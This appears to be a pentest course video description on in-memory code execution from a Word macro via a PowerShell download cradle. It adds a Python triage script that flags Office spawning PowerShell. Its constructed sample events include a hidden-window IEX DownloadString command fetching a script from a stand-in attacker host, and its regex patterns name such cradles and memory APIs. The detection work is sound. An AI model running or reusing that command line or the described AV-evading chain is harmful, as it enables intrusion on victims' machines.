In-Memory Code Execution With Word Macro
Macros are series of commands and instructions grouped together as a single command to accomplish a task automatically. Office versions prior to 2007 ship with the Macros feature enabled.
Macros can also be abused: they let Red Teamers execute malicious code or carry out a malicious task and help them gain entry inside an infrastructure. Because the code comes from a legitimate source, MS Office, it appears legitimate and may raise no alert or suspicion.
This video demonstrates how to code a VB Macro inside a Word Document which first substitutes a Word page, then downloads a PowerShell script from the attacker's server and executes it straight in memory, leaving no footprint, artifact or residue behind on the victim's machine.
The PowerShell script uses the System.Runtime.InteropServices namespace to import Kernel32.dll and call Windows APIs such as VirtualAlloc, then creates a thread, so even after the parent process exits the child process or payload still lives on and works under the radar.
This technique bypasses common antivirus engines, but not all of them. It can still be detected by various EDRs and AV vendors.
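The detection side of what is described above, as an added example that is not part of the video or the course: the chain leaves two things a defender can log even when nothing touches disk, a process-creation event in which an Office application is the parent of a script host (Sysmon Event ID 1, fields `ParentImage`, `Image`, `CommandLine`), and, with PowerShell Script Block Logging enabled, the script text itself (Event ID 4104), which must name the Win32 APIs it uses. The log records below are constructed for the example; the scoring thresholds and pattern names are assumptions, not a vendor's rule set.

```python
"""Triage constructed Sysmon-style events for the Office-macro -> PowerShell
in-memory execution chain. Added example; field names follow Sysmon's
process-creation event, sample records are made up for illustration."""
import json
import re

# Image file names (lower-case) of interest on each side of the parent/child edge.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line traits of a "download and run in memory" launch; each adds to the score.
CRADLE_PATTERNS = {
    "inline-exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "web-download": re.compile(r"DownloadString|DownloadData|Net\.WebClient|Invoke-WebRequest", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no-profile": re.compile(r"-nop\b|-noprofile", re.I),
}

# What a logged script block shows when it maps and runs code via Win32 from PowerShell.
MEMORY_API_PATTERN = re.compile(r"kernel32(\.dll)?|VirtualAlloc|CreateThread|DllImport", re.I)


def image_name(path: str) -> str:
    """Reduce a full image path to its lower-case file name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_process_event(event: dict) -> dict:
    """Score one process-creation event; an Office parent of a script host dominates."""
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    score, reasons = 0, []
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        score += 5
        reasons.append(f"office-spawns-script-host:{parent}->{child}")
    for name, pattern in CRADLE_PATTERNS.items():
        if pattern.search(cmdline):
            score += 2
            reasons.append(name)
    return {"score": score, "reasons": reasons, "alert": score >= 5}  # threshold is an assumption


def score_script_block(text: str) -> dict:
    """Flag a logged script block that names the memory-mapping APIs (Event 4104)."""
    hits = sorted({m.group(0).lower() for m in MEMORY_API_PATTERN.finditer(text)})
    return {"hits": hits, "alert": len(hits) >= 2}


def triage(events: list) -> list:
    """Return only the events that cross the alert threshold, with their reasons."""
    alerts = []
    for event in events:
        verdict = score_process_event(event)
        if verdict["alert"]:
            alerts.append({"parent": image_name(event["ParentImage"]),
                           "image": image_name(event["Image"]), **verdict})
    return alerts


# Constructed records: a normal Word launch, the macro-spawned cradle, a benign
# Word child (print helper), and an administrator's PowerShell from cmd.exe.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" /n "C:\\Users\\alice\\Documents\\invoice.docm"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "IEX (...DownloadString(\'http://attacker.invalid/stage.ps1\')...)"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "C:\\Windows\\splwow64.exe 12288"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
]

# Constructed fragment of what Event 4104 would record; the API signatures are elided.
SAMPLE_SCRIPT_BLOCK = """
$k = '[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(...);
      [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(...);'
"""

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_EVENTS), indent=2))
    print(json.dumps(score_script_block(SAMPLE_SCRIPT_BLOCK)))
```

Only the second record alerts: the Office-to-PowerShell edge alone reaches the threshold, and the cradle flags add confidence rather than being required, which is deliberate, since the command line is the part an attacker can vary while the parent process is not. The script-block check is the complement for the "nothing on disk" case: because the payload has to declare `VirtualAlloc` and a thread-creation call to run from memory, those names end up in the 4104 log even though no file is written.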
Techniques to make it truly undetectable are discussed in a later module of the course.
This is a video from one of the modules, "Client Side Attacks", of our upcoming course on Penetration Testing, which will be fully hands-on and focus on subjects like Protocol Exploitation, Buffer Overflow, Client Side Attacks, Privilege Escalation (Windows & Linux), Advanced Tunnelling Techniques and much more.
Author: https://www.linkedin.com/in/anrbn/
Video "In-Memory Code Execution With Word Macro" by Курсы успеха
16 October 2024, 0:16:40
00:18:23